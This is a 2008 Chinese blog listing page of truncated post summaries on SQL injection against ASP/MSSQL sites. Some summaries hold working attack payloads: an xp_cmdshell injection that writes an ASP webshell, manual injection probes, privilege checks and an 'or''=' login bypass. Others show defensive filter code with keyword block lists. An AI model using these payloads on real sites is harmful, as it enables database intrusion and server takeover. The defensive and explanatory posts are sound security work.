摘要:
1、 用^转义字符来写ASP(一句话木马)文件的方法: ? http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell 'echo ^ >c:\mu.asp';-- ? echo ^ >c:\mu.asp 2、 显示SQL系统版本: ? http://192.168.1.5/displ... 阅读全文
posted @ 2008-07-11 10:14
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(258)
评论(0)
推荐(0)
摘要:
手动方式SQL注入脚本命令之精华版 1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符'and [查询条件] and ''=' 4.搜索时没过滤参数的'and [查询条件] and '%25'=' 5.判断数据库系统 ... 阅读全文
posted @ 2008-07-11 10:13
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(223)
评论(0)
推荐(0)
摘要:
方法大家都会偶拖出来看思路滴。 最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句: EXEC master.dbo.xp_cmdshell ‘dir c:\‘ 但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯... 阅读全文
posted @ 2008-07-11 10:12
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(279)
评论(0)
推荐(0)
摘要:
//看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and 1= (Select HAS_DBACCESS('master')) And char(124)%2BCas... 阅读全文
posted @ 2008-07-11 10:11
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(195)
评论(0)
推荐(0)
摘要:
1.现在3年前的漏洞还有很多站存在,login.asp后台用'or''='或'or'='or'者代替用户名密码获得管理员. 解决方法:搜索login.asp下的 这个together.asp文件放在同1个目录 together.asp的内容如下: "" Then If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")0 or Instr(LCase(Request... 阅读全文
posted @ 2008-07-11 10:05
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(274)
评论(0)
推荐(0)
摘要:
1.现在3年前的漏洞还有很多站存在,login.asp后台用'or''='或'or'='or'者代替用户名密码获得管理员. 解决方法:搜索login.asp下的 这个together.asp文件放在同1个目录 together.asp的内容如下: "" Then If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")0 or Instr(LCase(Request... 阅读全文
posted @ 2008-07-11 09:13
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(287)
评论(0)
推荐(0)
摘要:
1.现在3年前的漏洞还有很多站存在,login.asp后台用'or''='或'or'='or'者代替用户名密码获得管理员. 解决方法:搜索login.asp下的 这个together.asp文件放在同1个目录 together.asp的内容如下: "" Then If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")0 or Instr(LCase(Request... 阅读全文
posted @ 2008-07-11 08:47
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(541)
评论(0)
推荐(0)
摘要:
SQL注入是什么? 许多网站程序在编写时,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码(一般是在浏览器地址栏进行,通过正常的www端口访问),根据程序返回的结果,获得某些想得知的数据,这就是所谓的SQL Injection,即SQL注入。 网站的恶梦——SQL注入 SQL注入通过网页对网站数据库进行修改。它能够直接在数据库中添加具有管理员权限的用户... 阅读全文
posted @ 2008-07-11 08:46
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(233)
评论(0)
推荐(0)
摘要:
|,|`|~|!|$|%|^|(|)|insert|select|delete|update|count|*|%|%20|truncate|declare" '防止Get方法注入 If Request.QueryString"" Then sql_Strs = Split(sql_GetDatas,"|") For Each sql_FilerStr In Request.QueryStrin... 阅读全文
posted @ 2008-07-11 08:46
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(480)
评论(0)
推荐(0)
摘要:
检测工具:明小子旁注Domain V3.5 用工具检测到网站存在SQL注入点,那么如何进行修补呢? 1.新建一个asp文件,写入以下代码,保存文件名为checkSQL.asp。 "" Then If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")0 or Instr(LCas... 阅读全文
posted @ 2008-07-11 08:45
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(634)
评论(0)
推荐(0)
摘要:
引 言 随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业的入门门槛不高,程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用... 阅读全文
posted @ 2008-07-11 08:44
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(324)
评论(0)
推荐(0)
摘要:
开新窗口(view plain)复制(copy to clipboard)打印(print)关于(about) ' ============================================ ' SQL 注入漏洞检查 ' 每一页开头进行测试 ' ======================================... 阅读全文
posted @ 2008-07-11 08:43
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(380)
评论(0)
推荐(0)
摘要:
编写通用的SQL防注入程序一般的http请求不外乎get 和 post,所以只要我们在文件中过滤所有post或者get请求中的参数信息中非法字符即可,所以我们实现http 请求信息过滤就可以判断是是否受到SQL注入攻击。 IIS传递给asp.dll的get 请求是是以字符串的形式,,当 传递给Request.QueryString数据后,asp解析器会分析Request.QueryString... 阅读全文
posted @ 2008-07-11 08:42
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(466)
评论(0)
推荐(0)
摘要:
SQL注入原理和ASP防注射漏洞经典方法 比较经典的一片帖子,最近做个站联系被人注,烦恼,找了下资料整理一下,今天汇总转过来大家学习一下:编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。 常见的修改站点注射漏洞方法小结如下: 修补SQL注射漏... 阅读全文
posted @ 2008-07-11 08:42
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(422)
评论(0)
推荐(0)
摘要:
1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符 'and [查询条件] and ''=' 4.搜索时没过滤参数的 'and [查询条件] and '%25'=' 5.判断数据库系统 ;and (select count(*) from sysobjects)>0 mssql ;and (select coun... 阅读全文
posted @ 2008-07-11 08:40
广陵散仙(www.cnblogs.com/junzhongxu/)
阅读(297)
评论(0)
推荐(0)

浙公网安备 33010602011771号